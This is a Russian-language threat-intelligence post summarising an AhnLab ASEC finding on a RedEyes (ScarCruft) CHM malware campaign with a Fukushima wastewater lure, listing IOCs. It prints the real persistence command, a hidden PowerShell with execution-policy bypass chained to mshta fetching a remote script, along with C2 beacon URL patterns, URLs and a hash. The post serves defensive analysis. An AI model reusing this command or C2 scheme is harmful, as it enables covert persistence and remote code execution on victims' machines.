Главная страница » IOC
0
2 года
IOC

RedEyes (ScarCruft) APT IOCs - Part 3

security

Аналитическая группа AhnLab Security Emergency response Center (ASEC) недавно обнаружила, что вредоносная программа CHM, предположительно созданная группой RedEyes, снова распространяется.

RedEyes (ScarCruft) APT

В последней атаке использовалась информация о сбросе сточных вод АЭС "Фукусима". Используя столь резонансную тему в Корее, угрожающий агент провоцирует любопытство пользователя и заставляет его открыть вредоносный файл.

Раньше команда mshta выполнялась непосредственно CHM-файлом (hh.exe), но недавно распространенный файл зарегистрировал команду на ключе RUN, что позволяет запускать ее при перезагрузке системы.

Регистрация ключа RUN
Путь в реестре: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Имя значения: fGZtm
Значение: c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html

При выполнении команды, зарегистрированной на ключ RUN, через mshta запускается дополнительный скрипт по определенному URL. Указанный URL содержит код JavaScript (JS). Этот код отвечает за выполнение закодированной команды PowerShell. По своей структуре этот процесс похож на команды, используемые в атаках ранее рассмотренных вредоносных программ CHM и M2RAT.

Расшифрованная команда PowerShell представляет собой бэкдор, отвечающий за регистрацию ключа RUN для установления постоянства, получение команд с сервера угрожающего агента и передачу результатов выполнения команд. Он получает команды от сервера угрозы и в соответствии с ними может выполнять различные вредоносные действия, такие как загрузка/выгрузка файлов, передача информации о конкретных файлах, редактирование реестра.

C2
hxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[Имя компьютера]-[Имя пользователя] // Получение команды агента угроз
hxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[кодировка BASE64] // Передача результатов выполнения команды

Indicators of Compromise

URLs

  • http://navercorp.ru/dashboard/image/202302/4.html
  • http://navercorp.ru/dashboard/image/202302/com.php

MD5

  • 52f71fadf0ea5ffacd753e83a3d0af1a
Комментарии: 0
Похожие записи
0
2 дня
IOC

APT-группа ToddyCat использует уязвимость в ESET для проксирования DLL-файлов

security
Группы APT используют различные методы обхода защитных систем, чтобы скрыть свою деятельность в зараженных системах. Одним из таких методов является использование руткитов на уровне ядра в системах Windows.
0
2 дня
IOC

Lazarus расширяет вредоносную кампанию npm: 11 новых пакетов добавляют загрузчики вредоносного ПО и полезную нагрузку Bitbucket

security
Группа злоумышленников Contagious Interview, предположительно связанная с Северной Кореей и известная как Lazarus Group, продолжает свою вредоносную кампанию, расширяя свое присутствие в экосистеме npm.
0
6 дней
IOC

BeaverTail и Tropidoor распространялись через рекрутинговые письма

security
В ноябре 2024 года был раскрыт случай распространения вредоносных программ BeaverTail и Tropidoor через рекрутинговые электронные письма, где злоумышленники выдавали себя за рекрутеров из сообщества разработчиков Dev.
0
6 дней
IOC

EncryptHub APT IOCs - Part 2

security
Угроза EncryptHub обнародована, когда команда разведки угроз KrakenLabs и Outpost24 провели исследование о его деятельности. EncryptHub стал все более популярным и развивающимся киберпреступником.